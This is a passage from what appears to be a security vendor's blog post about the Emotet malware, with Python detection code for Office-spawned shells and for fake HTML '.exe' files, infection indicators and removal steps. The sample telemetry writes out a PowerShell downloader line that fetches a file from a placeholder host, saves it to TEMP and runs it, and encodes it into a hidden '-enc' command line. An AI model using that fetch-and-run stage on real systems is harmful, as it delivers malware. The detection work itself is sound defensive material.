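        if basename(e["image"]) not in SHELLS or e["pid"] in shell_parents:
            continue
        chain, cur, seen = [e], e, {e["pid"]}
        while cur["ppid"] in by_pid and cur["ppid"] not in seen:  # walk up, guard against loops
            cur = by_pid[cur["ppid"]]
            chain.append(cur)
            seen.add(cur["pid"])
        names = [basename(x["image"]) for x in reversed(chain)]
        if not any(n in OFFICE_APPS for n in names):
            continue
        decoded = decode_encoded_command(e["cmdline"])
        findings.append({
            "pid": e["pid"],
            "chain": names,
            "decoded": decoded,
            "urls": URL_RE.findall(decoded or ""),
        })
    return findings


# --- constructed sample telemetry -------------------------------------------
def _encode_ps(script):
    """Encode a script the way `powershell -enc` expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Hypothetical downloader stage; host, path and file name are placeholders.
DOWNLOADER = ("$u='http://example.invalid/wp-content/x/';"
              "(New-Object Net.WebClient).DownloadFile($u,$env:TEMP+'\\742.exe');"
              "Start-Process ($env:TEMP+'\\742.exe')")
ENC = _encode_ps(DOWNLOADER)

SAMPLE_EVENTS = [
    {"pid": 812, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 812, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\bob\Downloads\Greeting_Card.doc"'},
    {"pid": 4388, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell -nop -w hidden -enc " + ENC},
    {"pid": 4402, "ppid": 4388, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc " + ENC},
    {"pid": 5010, "ppid": 812, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c whoami"},  # benign
]

if __name__ == "__main__":
    for f in find_office_shell_chains(SAMPLE_EVENTS):
        print(" -> ".join(f["chain"]), "downloads", f["urls"])
```

The parent-child rule is the durable part of this detection: the obfuscated VBA and the distribution URLs change from campaign to campaign, but an Office process has no business launching a shell, so that edge in the process tree survives every rewrite of the macro.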
Who is affected
Many people assume that they will not be targets of malware campaigns. Emotet, though, targets everyone equally: its simple goal is to get onto every machine it can and then get paid to let other, more targeted malware in behind it. If your email address has ever been sold, disclosed in a breach, or was in a friend's contact list when they got infected, then you may receive a malicious email that appears to come from them.
Indicators of infection
The main location for the executable is C:\Users\<name>\AppData\Local\ followed by whatever new name Emotet decides to use. One we have seen often is archivessymbol, but this will change. If you see something in this folder you do not know about, it is important to run a scan.
Versions of Emotet can also drop files onto your computer in C:\Users\Public or C:\Users\<username>:
These files generally have 5-6 randomly generated digits in the file name, followed by .exe. They are not actually executables but HTML documents used to generate revenue for the black hats by simulating clicks on web advertisements.
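Because these files are named .exe but contain HTML, a name check alone is not enough; the content has to be inspected. The Python below is an added example, not Emotet's code or SUPERAntiSpyware's, that lists every .exe in a directory, classifies it by its first bytes (a real Windows executable begins with the two bytes "MZ"), and flags any that are HTML or otherwise not a PE image, while also noting whether the name matches the 5-6 digit pattern described above. It builds its own throwaway sample directory with constructed files; on a real host you would point scan_dir at C:\Users\Public and the user's profile folder.

```python
"""Find ".exe" files that are really HTML, as the Emotet click-fraud files are.

Added example for this post (not Emotet's or SUPERAntiSpyware's code). A real
Windows executable starts with the two bytes "MZ"; the files described above
carry an .exe name but contain HTML. The sample directory is constructed here.
"""
import os
import re
import tempfile

EMOTET_NAME_RE = re.compile(r"^\d{5,6}\.exe$", re.IGNORECASE)
HTML_MARKERS = (b"<!doctype", b"<html", b"<head", b"<body", b"<script")


def classify(path):
    """Return 'pe', 'html' or 'unknown' from the file's first bytes, not its name."""
    with open(path, "rb") as fh:
        head = fh.read(1024)
    if head.startswith(b"MZ"):
        return "pe"
    # Skip a UTF-8 BOM and leading whitespace before looking for HTML.
    probe = head.lstrip(b"\xef\xbb\xbf \t\r\n").lower()
    if probe.startswith(HTML_MARKERS):
        return "html"
    return "unknown"


def scan_dir(directory):
    """Flag every *.exe in directory whose content is not a real PE image."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not (os.path.isfile(path) and name.lower().endswith(".exe")):
            continue
        kind = classify(path)
        findings.append({
            "path": path,
            "kind": kind,
            "emotet_name": bool(EMOTET_NAME_RE.match(name)),
            "suspicious": kind != "pe",
        })
    return findings


def build_sample_dir():
    """Create a throwaway directory with constructed files mimicking the indicators."""
    d = tempfile.mkdtemp(prefix="emotet_ioc_demo_")
    samples = {
        # Emotet-style name, HTML body: the click-fraud case described in the post.
        "48213.exe": b"<!DOCTYPE html><html><body><script>location='http://example.invalid/ad'"
                     b"</script></body></html>",
        # Emotet-style name but a genuine MZ header (only the header is needed here).
        "731904.exe": b"MZ" + b"\x00" * 62,
        # Ordinary executable name, genuine MZ header.
        "setup.exe": b"MZ" + b"\x00" * 62,
        "notes.txt": b"just a text file",
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return d


if __name__ == "__main__":
    for f in scan_dir(build_sample_dir()):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['kind']:7} {f['path']}")
```

A file whose name says .exe but whose content is HTML cannot be started by double-clicking, so it is harmless by itself; its presence is what matters, because it shows an Emotet module has already run on the machine and the rest of the removal steps below still apply.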
What you can do
If you or someone you know is infected with the Emotet malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Emotet from any Windows computer.
Emotet has also been known to spread using the EternalBlue exploit, which targets a vulnerability in the Windows SMBv1 service. Microsoft fixed this vulnerability in security bulletin MS17-010, and applying that patch helps protect you from Emotet as well as other malware that uses the same exploit.
HOW TO REMOVE EMOTET
Restart the infected computer in safe mode without networking
Search through the Indicators of infection listed above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
Delete files and folders that have been confirmed as malware.
Repeat steps 1-3 on all other machines in the network.
Restore all infected computers to normal mode only after confirming the infection is removed.